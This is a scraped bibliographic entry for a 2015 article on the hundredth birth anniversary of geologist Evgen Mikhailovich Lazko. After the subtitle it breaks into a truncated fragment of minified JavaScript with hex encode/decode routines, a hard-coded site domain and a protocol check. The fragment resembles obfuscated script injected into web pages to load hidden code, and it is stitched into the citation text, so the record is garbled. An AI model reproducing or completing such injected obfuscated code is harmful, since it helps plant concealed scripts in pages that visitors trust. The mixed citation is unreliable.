PROFESSOR LAZKO EVGEN MIKHAILOVICH – THE GREATEST GEOLOGIST IN THE PRECAMBRIAN - Shatalov, N.N. (Institute of Geological Sciences, NAS of Ukraine, 2015)
(On the 100th Anniversary of the Birth).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "geojournal.igs-nas.org.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e